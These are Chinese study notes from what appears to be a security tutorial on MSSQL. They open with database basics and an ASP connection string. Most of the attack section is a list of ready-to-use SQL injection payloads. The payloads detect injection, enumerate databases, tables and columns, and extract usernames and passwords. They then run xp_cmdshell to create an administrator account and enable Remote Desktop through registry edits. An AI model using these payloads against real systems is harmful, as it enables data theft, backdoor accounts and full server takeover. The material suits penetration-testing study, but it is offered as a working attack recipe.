某教程学习笔记(一):08、MSSQL数据库漏洞

简介: 某教程学习笔记(一):08、MSSQL数据库漏洞


一、MSSQL介绍


MSSQL商业,性能好,易用,企业支持好,有很多精度要高的类型,学校、政府、在线办公、游戏、棋牌等部门可能会用。


端口:1433


后缀:.mdf/.ldf


sa权限:数据库操作,文件管理,命令执行,注册表读取等,相当于win系统system


db权限:文件管理,数据库操作等,相当于win系统adminnstrators


public权限:数据库操作,相当于win系统guest


二、SQL SERVER 2005


1、安装成功,输入账号密码登陆

0a2653c851af460fa595bd959398a8f1.png

2、master、model、msdb、tempdb这四个数据库是系统自带数据库

0eacb84100b54626af849e6b562bf92a.png

3、右击数据库,新建数据库,自动生成两个文件

2d65d23f6d4748949b924e4057485923.png

4、双击展开新建的数据库,右击表,添加表,输入列名和数据类型,保存

2e9b90b2ca334476abebe75bafe6eeaa.png

5、右击新建的表,打开表,然后就可以添加我们的数据了

4cebaac233b3433da32a72337a77fc60.png

6、删除数据库,需要先右击要删除的数据库,选择任务,再选择分离,然后再进目录删除数据库


7、添加外来的数据库,先把数据库文件放进目录,然后右击数据数据库,选择附加


8、备份数据库,选择要备份的数据库右击,选择生成脚本,选择为服务器版本编写脚本(修改为自己要用的版本)


9、还原数据库,将导出的脚本里面的内容复制到sql语句,运行,就会和重新生成一个数据库,里面的内容和备份数据库的内容一样。


三、代码调用


<%


cctt = “provier=sqloledb;source=local;uid=sa;pwd=**;database=database1”


Set conn = Server.Createobject(“ADODB.Connection”)


conn.open cctt


%>


provider后面的不用管,照写; source后面的可以是ip地址,这里我用的是本地的;sa是内置的用户,它的密码是你在安装的时候设置的; database后面是你要连接的数据库的名称.


四、判断注入


and 1=1 返回正常


and 1=2 返回错误,说明有注入


and user>0 返回正常,说明是sqlserver注入


and (select count(*)from sysobjects)>0 mssql 返回正常,说明是sqlserver注入


猜数表名


and( select count()from[表名])>0


猜字段


and( select Count(字段名)from[表名])>0


猜字段中记录长度


and(select top1len(字段名)from表名)>0


猜字段的asc值( access)


and( (select top1 asc(mid(字段名,1,1)from表名)>0


猜字段的ascii值(mssql)


and( select top1 unicode(substring(字段名1,1)from表名)>0


测试权限结构( mssql)


and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));-- //判断是否是系统管理员


and 1=(select IS_SRVROLEMEMBERC(‘serveradmin’));–


and 1=(select IS_SRVROLEMEMBERC(‘setupadmin’));–


and 1=(select IS_SRVROLEMEMBERC(‘securityadmin’));–


and 1=(select IS_SRVROLEMEMBER(‘diskadmin’));–


and 1=(select IS_SRVROLEMEMBER(‘bulkadmin’);–


and 1=(select is_srvrolemember(‘db_owner’));–//判断是否是库权限


and 1=(select is_srvrolemember(‘public’));–//判断是否是pubilc权限


and 1=convert(int,db_name())或1=(select db_name())//当前数据库名


and 1=(select @@servername)//本地服务名


and 1=(select HAS_DBACCESS(‘master’))//判断是否有库读取权限


猜版本号


id=1 and 1=(select @@version)


id=@@version


猜数据库名称


id=1 and 1=(select db_name())


id=db_name()


获取所有数据库


id=1 and 1=(select name from master…sysdatabases for xml path)


获取第一个用户数据库


id=1 and 1=(select top 1 name from master…sysdatabases where dbid>4) #数据库是从第五个开始排的


获取下一个数据库


id=1 and 1=(select top 1 name from master…sysdatabases where dbid>4 and name <>‘上面查出来的数据库’)


或者


id=1 and 1=(select top 1 name from master…sysdatabases where dbid>5) #一次类推


获取所有表


id=1 and 1=(select name from sysobjects for xml path)


获取第一张表


id=1 and 1=(select top 1 name from sysobjects where xtype=‘u’)


获取下一张表


id=1 and 1=(select top 1 name from sysobjects where xtype=‘u’ and name <>‘上面查出来的表’)


获取表users第一列列名uname


id=1 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name=‘users’))


获取表users第二列列名upass


id=1 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name=‘users’) and name <> ‘uname’)


依次往后爆破


获取表users第一个用户名


?id=1 and 1=(select top 1 uname from users)


获取密码


?id=1 and 1=(select top 1 upass from users)


五、利用xp_cmdshell添加用户


id=1 ;exec master…xp_cmdshell ‘net user username password /add’


id=1 ;exec master… xp_cmdshell ‘net localgroup administrators username /add’ 添加到管理员组


六、开启3389端口


id=1 ;exec master…xp_cmdshell ‘sc config termservice start=auto’


;exec master…xp_cmdshell ‘net start termservice’


;exec master…xp_cmdshell ‘reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /vfDenyTSConnections /t REG_DWORD/d 0x0/f’


禁止非法,后果自负


目录
相关文章
|
28天前
|
存储 SQL 关系型数据库
Mysql学习笔记(二):数据库命令行代码总结
这篇文章是关于MySQL数据库命令行操作的总结,包括登录、退出、查看时间与版本、数据库和数据表的基本操作(如创建、删除、查看)、数据的增删改查等。它还涉及了如何通过SQL语句进行条件查询、模糊查询、范围查询和限制查询,以及如何进行表结构的修改。这些内容对于初学者来说非常实用,是学习MySQL数据库管理的基础。
106 6
|
28天前
|
SQL Ubuntu 关系型数据库
Mysql学习笔记(一):数据库详细介绍以及Navicat简单使用
本文为MySQL学习笔记,介绍了数据库的基本概念,包括行、列、主键等,并解释了C/S和B/S架构以及SQL语言的分类。接着,指导如何在Windows和Ubuntu系统上安装MySQL,并提供了启动、停止和重启服务的命令。文章还涵盖了Navicat的使用,包括安装、登录和新建表格等步骤。最后,介绍了MySQL中的数据类型和字段约束,如主键、外键、非空和唯一等。
64 3
Mysql学习笔记(一):数据库详细介绍以及Navicat简单使用
|
22天前
|
存储 SQL 关系型数据库
【入门级教程】MySQL:从零开始的数据库之旅
本教程面向零基础用户,采用通俗易懂的语言和丰富的示例,帮助你快速掌握MySQL的基础知识和操作技巧。内容涵盖SQL语言基础(SELECT、INSERT、UPDATE、DELETE等常用语句)、使用索引提高查询效率、存储过程等。适合学生、开发者及数据库爱好者。
37 0
【入门级教程】MySQL:从零开始的数据库之旅
|
1月前
|
tengine 关系型数据库 MySQL
Tengine、Nginx安装MySQL数据库命令教程
本指南详细介绍了在Linux系统上安装与配置MySQL数据库的步骤。首先通过下载并安装MySQL社区版本,接着启动MySQL服务,使用`systemctl start mysqld.service`命令。若启动失败,可尝试使用`sudo /etc/init.d/mysqld start`。利用`systemctl status mysqld.service`检查MySQL的服务状态,确保其处于运行中。通过日志文件获取初始密码,使用该密码登录数据库,并按要求更改初始密码以增强安全性。随后创建一个名为`tengine`的数据库,最后验证数据库创建是否成功以及完成整个设置流程。
|
24天前
|
SQL NoSQL MongoDB
一款基于分布式文件存储的数据库MongoDB的介绍及基本使用教程
一款基于分布式文件存储的数据库MongoDB的介绍及基本使用教程
39 0
|
28天前
|
存储 NoSQL API
.NET NoSQL 嵌入式数据库 LiteDB 使用教程
.NET NoSQL 嵌入式数据库 LiteDB 使用教程~
|
3天前
|
SQL 关系型数据库 MySQL
go语言数据库中mysql驱动安装
【11月更文挑战第2天】
14 4
|
26天前
|
存储 关系型数据库 MySQL
Mysql(4)—数据库索引
数据库索引是用于提高数据检索效率的数据结构,类似于书籍中的索引。它允许用户快速找到数据,而无需扫描整个表。MySQL中的索引可以显著提升查询速度,使数据库操作更加高效。索引的发展经历了从无索引、简单索引到B-树、哈希索引、位图索引、全文索引等多个阶段。
58 3
Mysql(4)—数据库索引
|
11天前
|
关系型数据库 MySQL Linux
在 CentOS 7 中通过编译源码方式安装 MySQL 数据库的详细步骤,包括准备工作、下载源码、编译安装、配置 MySQL 服务、登录设置等。
本文介绍了在 CentOS 7 中通过编译源码方式安装 MySQL 数据库的详细步骤,包括准备工作、下载源码、编译安装、配置 MySQL 服务、登录设置等。同时,文章还对比了编译源码安装与使用 RPM 包安装的优缺点,帮助读者根据需求选择最合适的方法。通过具体案例,展示了编译源码安装的灵活性和定制性。
51 2
|
14天前
|
存储 关系型数据库 MySQL
MySQL vs. PostgreSQL:选择适合你的开源数据库
在众多开源数据库中,MySQL和PostgreSQL无疑是最受欢迎的两个。它们都有着强大的功能、广泛的社区支持和丰富的生态系统。然而,它们在设计理念、性能特点、功能特性等方面存在着显著的差异。本文将从这三个方面对MySQL和PostgreSQL进行比较,以帮助您选择更适合您需求的开源数据库。
61 4
下一篇
无影云桌面